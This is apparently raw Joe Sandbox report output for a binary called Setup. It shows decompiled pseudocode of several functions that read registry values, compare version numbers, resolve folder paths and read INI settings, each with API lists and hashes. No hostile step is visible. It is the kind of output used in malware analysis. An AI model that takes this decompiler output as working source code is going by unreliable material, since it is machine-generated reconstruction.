                                                                                                                                                              				signed char _t59;
                                                                                                                                                              				intOrPtr _t62;
                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                              				intOrPtr _t69;
                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                              				intOrPtr _t86;
                                                                                                                                                              				signed int _t87;
                                                                                                                                                              				void* _t88;
                                                                                                                                                              				void* _t89;
                                                                                                                                                              
                                                                                                                                                              				_t86 = __esi;
                                                                                                                                                              				_t85 = __edi;
                                                                                                                                                              				_t72 = __ebx;
                                                                                                                                                              				_t56 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v16 = _t56 ^ _t87;
                                                                                                                                                              				_v568 = __ecx;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_v560 = 0;
                                                                                                                                                              				_v544 = 0;
                                                                                                                                                              				_v552 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v548 = 0;
                                                                                                                                                              				_v556 = 0;
                                                                                                                                                              				_v561 = 0;
                                                                                                                                                              				_t82 = _a4;
                                                                                                                                                              				_t59 = E004E7470(_v568, 0x80000002, _a4, _a8, 0,  &_v540, 0x104); // executed
                                                                                                                                                              				_v561 = _t59;
                                                                                                                                                              				if((_v561 & 0x000000ff) != 0) {
                                                                                                                                                              					_t82 =  &_v540;
                                                                                                                                                              					_t66 = E00452330( &_v560,  &_v540, __edi,  &_v540, ".",  &_v560);
                                                                                                                                                              					_t89 = _t88 + 0xc;
                                                                                                                                                              					_v12 = _t66;
                                                                                                                                                              					while(_v12 != 0) {
                                                                                                                                                              						_v544 = _v544 + 1;
                                                                                                                                                              						_t81 = _v544;
                                                                                                                                                              						_v572 = _v544;
                                                                                                                                                              						_v572 = _v572 - 1;
                                                                                                                                                              						if(_v572 <= 3) {
                                                                                                                                                              							switch( *((intOrPtr*)(_v572 * 4 +  &M004E76BC))) {
                                                                                                                                                              								case 0:
                                                                                                                                                              									_t81 = _v12;
                                                                                                                                                              									_push(_v12);
                                                                                                                                                              									_t71 = E004520B8();
                                                                                                                                                              									_t89 = _t89 + 4;
                                                                                                                                                              									_v552 = _t71;
                                                                                                                                                              									goto L9;
                                                                                                                                                              								case 1:
                                                                                                                                                              									__edx = _v12;
                                                                                                                                                              									_push(__edx);
                                                                                                                                                              									__eax = E004520B8();
                                                                                                                                                              									__esp = __esp + 4;
                                                                                                                                                              									_v8 = __eax;
                                                                                                                                                              									goto L9;
                                                                                                                                                              								case 2:
                                                                                                                                                              									__eax = _v12;
                                                                                                                                                              									_push(_v12);
                                                                                                                                                              									__eax = E004520B8();
                                                                                                                                                              									__esp = __esp + 4;
                                                                                                                                                              									_v548 = __eax;
                                                                                                                                                              									goto L9;
                                                                                                                                                              								case 3:
                                                                                                                                                              									__ecx = _v12;
                                                                                                                                                              									_push(__ecx);
                                                                                                                                                              									__eax = E004520B8();
                                                                                                                                                              									__esp = __esp + 4;
                                                                                                                                                              									_v556 = __eax;
                                                                                                                                                              									goto L9;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						L9:
                                                                                                                                                              						_t82 =  &_v560;
                                                                                                                                                              						_t69 = E00452330(_t81,  &_v560, _t85, 0, ".",  &_v560);
                                                                                                                                                              						_t89 = _t89 + 0xc;
                                                                                                                                                              						_v12 = _t69;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t42 =  &_a12; // 0x537d38
                                                                                                                                                              				if(_v552 <=  *_t42) {
                                                                                                                                                              					_t44 =  &_a12; // 0x537d38
                                                                                                                                                              					if(_v552 !=  *_t44) {
                                                                                                                                                              						L21:
                                                                                                                                                              						_t62 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t82 = _v8;
                                                                                                                                                              						_t46 =  &_a16; // 0x537c60
                                                                                                                                                              						if(_v8 <=  *_t46) {
                                                                                                                                                              							_t48 =  &_a16; // 0x537c60
                                                                                                                                                              							if(_v8 !=  *_t48) {
                                                                                                                                                              								goto L21;
                                                                                                                                                              							} else {
                                                                                                                                                              								if(_v548 <= _a20) {
                                                                                                                                                              									_t82 = _v548;
                                                                                                                                                              									if(_v548 != _a20 || _v556 < _a24) {
                                                                                                                                                              										goto L21;
                                                                                                                                                              									} else {
                                                                                                                                                              										_t62 = 1;
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									_t62 = 1;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							_t62 = 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t62 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				return E0044F6C8(_t62, _t72, _v16 ^ _t87, _t82, _t85, _t86);
                                                                                                                                                              			}
                                                                                                                                                              0x004e762e
                                                                                                                                                              0x004e763c
                                                                                                                                                              0x004e7641
                                                                                                                                                              0x004e7644
                                                                                                                                                              0x004e7644
                                                                                                                                                              0x004e7599
                                                                                                                                                              0x004e7652
                                                                                                                                                              0x004e7655
                                                                                                                                                              0x004e7663
                                                                                                                                                              0x004e7666
                                                                                                                                                              0x004e76a9
                                                                                                                                                              0x004e76a9
                                                                                                                                                              0x004e7668
                                                                                                                                                              0x004e7668
                                                                                                                                                              0x004e766b
                                                                                                                                                              0x004e766e
                                                                                                                                                              0x004e7679
                                                                                                                                                              0x004e767c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e767e
                                                                                                                                                              0x004e7687
                                                                                                                                                              0x004e768f
                                                                                                                                                              0x004e7698
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e76a5
                                                                                                                                                              0x004e76a5
                                                                                                                                                              0x004e76a5
                                                                                                                                                              0x004e7689
                                                                                                                                                              0x004e7689
                                                                                                                                                              0x004e7689
                                                                                                                                                              0x004e7687
                                                                                                                                                              0x004e7670
                                                                                                                                                              0x004e7670
                                                                                                                                                              0x004e7670
                                                                                                                                                              0x004e766e
                                                                                                                                                              0x004e7657
                                                                                                                                                              0x004e7657
                                                                                                                                                              0x004e7657
                                                                                                                                                              0x004e76b8

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004E7470: RegOpenKeyExW.KERNEL32(?,00000104,00000000,00020019,00000104,?,00000104), ref: 004E748C
                                                                                                                                                              • _wcstok_s.LIBCMT ref: 004E758E
                                                                                                                                                              • _wcstok_s.LIBCMT ref: 004E763C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcstok_s$Open
                                                                                                                                                              • String ID: 8}S$`|S8}S
                                                                                                                                                              • API String ID: 3879386483-3606869655
                                                                                                                                                              • Opcode ID: 9728a3ff92e0f71e6a12aea6d5b08f99367a5ec3e5b93e39bb7426e85638d084
                                                                                                                                                              • Instruction ID: a2f9222925fe8830c8f0cba5c2e6d96b03c4d239ebe84c64fdbbe26eb1bda9d0
                                                                                                                                                              • Opcode Fuzzy Hash: 9728a3ff92e0f71e6a12aea6d5b08f99367a5ec3e5b93e39bb7426e85638d084
                                                                                                                                                              • Instruction Fuzzy Hash: 525190B0D04259EBCB20DFA5E889BDEB770AB54325F2041DAE4096B241D738AF85CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00432780(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				signed int _v5;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v21;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				char _v32;
                                                                                                                                                              				char _v33;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v41;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				char _v49;
                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				char* _t66;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				void* _t81;
                                                                                                                                                              				void* _t95;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              				intOrPtr* _t98;
                                                                                                                                                              				intOrPtr* _t101;
                                                                                                                                                              				void* _t142;
                                                                                                                                                              				void* _t143;
                                                                                                                                                              				void* _t147;
                                                                                                                                                              
                                                                                                                                                              				_v56 = __ecx;
                                                                                                                                                              				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
                                                                                                                                                              				_v12 =  *((intOrPtr*)(_v56 + 4));
                                                                                                                                                              				_v5 = 1;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t66 = E004271F0(_v16);
                                                                                                                                                              					_t143 = _t142 + 4;
                                                                                                                                                              					_t149 =  *_t66;
                                                                                                                                                              					if( *_t66 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_v12 = _v16;
                                                                                                                                                              					_t95 = E00436060(_t149, _v16);
                                                                                                                                                              					_t96 = E00415110(_a8);
                                                                                                                                                              					_t147 = _t143 + 8;
                                                                                                                                                              					_v5 = E0041CC50(_v56, _t96, _t95);
                                                                                                                                                              					if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                              						_t98 = E00441910(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t98;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t101 = E00415110(_v16);
                                                                                                                                                              						_t142 = _t147 + 4;
                                                                                                                                                              						_v60 =  *_t101;
                                                                                                                                                              					}
                                                                                                                                                              					_v16 = _v60;
                                                                                                                                                              				}
                                                                                                                                                              				__eflags = 0;
                                                                                                                                                              				if(0 == 0) {
                                                                                                                                                              					E00445360( &_v20, _v12);
                                                                                                                                                              					__eflags = _v5 & 0x000000ff;
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							E004339F0( &_v20);
                                                                                                                                                              							L13:
                                                                                                                                                              							_t72 = E00415110(_a8);
                                                                                                                                                              							__eflags = E0041CC50(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_v49 = 0;
                                                                                                                                                              								E00445E50(_a4,  &_v20,  &_v49);
                                                                                                                                                              								return _a4;
                                                                                                                                                              							}
                                                                                                                                                              							_v41 = 1;
                                                                                                                                                              							_t81 = E00433210(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8); // executed
                                                                                                                                                              							E00445E50(_a4, _t81,  &_v41);
                                                                                                                                                              							return _a4;
                                                                                                                                                              						}
                                                                                                                                                              						_v33 = 1;
                                                                                                                                                              						E00445E50(_a4, E00433210(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
                                                                                                                                                              						return _a4;
                                                                                                                                                              					}
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				_v21 = 1;
                                                                                                                                                              				E00445E50(_a4, E00433210(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
                                                                                                                                                              				return _a4;
                                                                                                                                                              			}



























                                                                                                                                                              0x00432810
                                                                                                                                                              0x00432810
                                                                                                                                                              0x00432815
                                                                                                                                                              0x00432817
                                                                                                                                                              0x00432857
                                                                                                                                                              0x00432860
                                                                                                                                                              0x00432862
                                                                                                                                                              0x0043287e
                                                                                                                                                              0x00432880
                                                                                                                                                              0x004328b6
                                                                                                                                                              0x004328bb
                                                                                                                                                              0x004328bf
                                                                                                                                                              0x004328e5
                                                                                                                                                              0x004328e7
                                                                                                                                                              0x0043291a
                                                                                                                                                              0x00432929
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0043292e
                                                                                                                                                              0x004328e9
                                                                                                                                                              0x00432905
                                                                                                                                                              0x0043290e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00432913
                                                                                                                                                              0x00432882
                                                                                                                                                              0x004328a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004328a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00432864
                                                                                                                                                              0x00432819
                                                                                                                                                              0x0043283e
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 83a200561d82b1da2885810ffe1412cd26173f885f1465ae3b1c524424ee90a5
                                                                                                                                                              • Instruction ID: 7f02a2f273940e8c15b7f1e878ab3f7c789518f2149d08669c4bd01c7883c5cd
                                                                                                                                                              • Opcode Fuzzy Hash: 83a200561d82b1da2885810ffe1412cd26173f885f1465ae3b1c524424ee90a5
                                                                                                                                                              • Instruction Fuzzy Hash: 425171B5D04108BFDB08DFD5D891AEF77B9AF48304F10805EF415A7252DB38AA05CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E00495D00(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, signed int _a4, intOrPtr _a8, signed char _a12, signed char _a16) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v542;
                                                                                                                                                              				short _v544;
                                                                                                                                                              				intOrPtr _v548;
                                                                                                                                                              				char _v580;
                                                                                                                                                              				char _v581;
                                                                                                                                                              				signed int _t28;
                                                                                                                                                              				signed int _t29;
                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                              				intOrPtr _t45;
                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                              				signed int _t65;
                                                                                                                                                              
                                                                                                                                                              				_t64 = __esi;
                                                                                                                                                              				_t63 = __edi;
                                                                                                                                                              				_t45 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x508544);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t28 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t29 = _t28 ^ _t65;
                                                                                                                                                              				_v20 = _t29;
                                                                                                                                                              				_push(_t29);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                                                                                              					_a4 = _a4 | 0x00008000;
                                                                                                                                                              				}
                                                                                                                                                              				_v544 = 0;
                                                                                                                                                              				_t33 = E00451D90(_t63,  &_v542, 0, 0x206);
                                                                                                                                                              				_t62 = _a4;
                                                                                                                                                              				__imp__SHGetFolderPathW(0, _a4, 0, 0,  &_v544); // executed
                                                                                                                                                              				_v548 = _t33;
                                                                                                                                                              				if(_v548 != 0) {
                                                                                                                                                              					E00417A20(_t45, _a8 + 4, _t63, _t64, 0, 0xffffffff);
                                                                                                                                                              				} else {
                                                                                                                                                              					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                              						_t62 =  &_v544;
                                                                                                                                                              						PathRemoveBackslashW( &_v544);
                                                                                                                                                              					} else {
                                                                                                                                                              						PathAddBackslashW( &_v544);
                                                                                                                                                              					}
                                                                                                                                                              					E00417910( &_v544, E00434050( &_v581));
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					E004181D0(_a8,  &_v580);
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_v548, _t45, _v20 ^ _t65, _t62, _t63, _t64);
                                                                                                                                                              			}


                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 00495D56
                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,004CC849,00000000,00000000,?,?,?,DDD124F9), ref: 00495D6F
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?,?,?,DDD124F9), ref: 00495D93
                                                                                                                                                              • PathRemoveBackslashW.SHLWAPI(?,?,?,DDD124F9), ref: 00495DA2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Path$Backslash$FolderRemove_memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3929315810-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004E7470(intOrPtr __ecx, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				long _t13;
                                                                                                                                                              				long _t16;
                                                                                                                                                              
                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                              				_t13 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                              					_t16 = RegQueryValueExW(_v8, _a12, 0,  &_a16, _a20,  &_a24); // executed
                                                                                                                                                              					if(_t16 == 0) {
                                                                                                                                                              						RegCloseKey(_v8);
                                                                                                                                                              						return 1;
                                                                                                                                                              					}
                                                                                                                                                              					RegCloseKey(_v8);
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNEL32(?,00000104,00000000,00020019,00000104,?,00000104), ref: 004E748C
                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,?), ref: 004E74B0
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004E74BE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00433110(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				E00433190(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8)))); // executed
                                                                                                                                                              				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				 *((intOrPtr*)(_v8 + 8)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				_t21 = E00433720(_v8);
                                                                                                                                                              				 *_t21 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				return _t21;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E00451EC5(long _a4) {
                                                                                                                                                              				void* _t6;
                                                                                                                                                              				void* _t9;
                                                                                                                                                              				void* _t10;
                                                                                                                                                              
                                                                                                                                                              				_t11 =  *0x51d710;
                                                                                                                                                              				if( *0x51d710 != 0 && E0045B680(_t11, 0x51d710) != 0) {
                                                                                                                                                              					 *0x51d710();
                                                                                                                                                              				}
                                                                                                                                                              				if(E00457387(_t6) != 0) {
                                                                                                                                                              					E00457549(_t6, _t9, _t10, _t2); // executed
                                                                                                                                                              				}
                                                                                                                                                              				ExitThread(_a4);
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00451ED8
                                                                                                                                                                • Part of subcall function 0045B680: __FindPESection.LIBCMT ref: 0045B6DB
                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 00451EE8
                                                                                                                                                              • __freeptd.LIBCMT ref: 00451EF2
                                                                                                                                                              • ExitThread.KERNEL32 ref: 00451EFB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3182216644-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E004D2C30(intOrPtr __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, void* __eflags, signed int _a4, intOrPtr _a8) {
                                                                                                                                                              				WCHAR* _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				WCHAR* _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				char _v542;
                                                                                                                                                              				short _v544;
                                                                                                                                                              				char _v576;
                                                                                                                                                              				char _v577;
                                                                                                                                                              				char _v608;
                                                                                                                                                              				WCHAR* _v612;
                                                                                                                                                              				intOrPtr _v616;
                                                                                                                                                              				intOrPtr _v620;
                                                                                                                                                              				signed int _t46;
                                                                                                                                                              				signed int _t47;
                                                                                                                                                              				WCHAR* _t55;
                                                                                                                                                              				signed char _t62;
                                                                                                                                                              				short _t66;
                                                                                                                                                              				signed int _t117;
                                                                                                                                                              
                                                                                                                                                              				_t116 = __esi;
                                                                                                                                                              				_t115 = __edi;
                                                                                                                                                              				_t77 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50dedf);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t46 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t47 = _t46 ^ _t117;
                                                                                                                                                              				_v24 = _t47;
                                                                                                                                                              				_push(_t47);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				E004160E0(E004D1B70(__ecx, 2), _a4, 1);
                                                                                                                                                              				if((E00416630(_a4 + 4) & 0x000000ff) == 0) {
                                                                                                                                                              					_t55 = E004D22E0(__ebx, __edi, __esi, 0); // executed
                                                                                                                                                              					_v20 = _t55;
                                                                                                                                                              					if(_a8 != 0) {
                                                                                                                                                              						if(( *(E004051D0(__ebx, _a4 + 4, __edi, __esi, 0)) & 0x0000ffff) != 0x2a) {
                                                                                                                                                              							__eflags = _a4;
                                                                                                                                                              							if(_a4 == 0) {
                                                                                                                                                              								_v612 = 0;
                                                                                                                                                              							} else {
                                                                                                                                                              								_v612 = _a4 + 4;
                                                                                                                                                              							}
                                                                                                                                                              							_v616 = E00409760( &_v608, _a8, _v612);
                                                                                                                                                              							_v620 = _v616;
                                                                                                                                                              							_v8 = 1;
                                                                                                                                                              							E00409880(_a4, __eflags, _v620);
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E004178C0( &_v608);
                                                                                                                                                              							_t110 = _a4;
                                                                                                                                                              							_t62 = E0049E7E0(_a4, 0); // executed
                                                                                                                                                              							__eflags = _t62 & 0x000000ff;
                                                                                                                                                              							if((_t62 & 0x000000ff) == 0) {
                                                                                                                                                              								__eflags = _a4 + 4;
                                                                                                                                                              								E00405140(_a4 + 4);
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							_t66 =  *0x5346b4; // 0x0
                                                                                                                                                              							_v544 = _t66;
                                                                                                                                                              							E00451D90(__edi,  &_v542, 0, 0x206);
                                                                                                                                                              							E00417A20(__ebx, _a4 + 4, _t115, __esi, 0, 1);
                                                                                                                                                              							_t110 =  &_v544;
                                                                                                                                                              							if(SearchPathW(0, E00416A30(_a4 + 4), 0, 0x104,  &_v544, 0) == 0) {
                                                                                                                                                              								__eflags = _a4 + 4;
                                                                                                                                                              								E00405140(_a4 + 4);
                                                                                                                                                              							} else {
                                                                                                                                                              								E00417910( &_v544, E00434050( &_v577));
                                                                                                                                                              								_v8 = 0;
                                                                                                                                                              								E004181D0(_a4,  &_v576);
                                                                                                                                                              								_v8 = 0xffffffff;
                                                                                                                                                              								E004176E0();
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						if((E00416630(_a4 + 4) & 0x000000ff) != 0) {
                                                                                                                                                              							_v20 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				_t44 =  &_v24; // 0x4d2f4a
                                                                                                                                                              				return E0044F6C8(_v20, _t77,  *_t44 ^ _t117, _t110, _t115, _t116);
                                                                                                                                                              			}






















                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004D22E0: _memset.LIBCMT ref: 004D23BC
                                                                                                                                                                • Part of subcall function 004D22E0: GetPrivateProfileStringW.KERNEL32 ref: 004D23E8
                                                                                                                                                              • _memset.LIBCMT ref: 004D2CDA
                                                                                                                                                              • SearchPathW.KERNEL32(00000000,00000000,00000000,00000104,?,00000000,00000000,00000001,?,?,00000000,?,DDD124F9), ref: 004D2D0F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
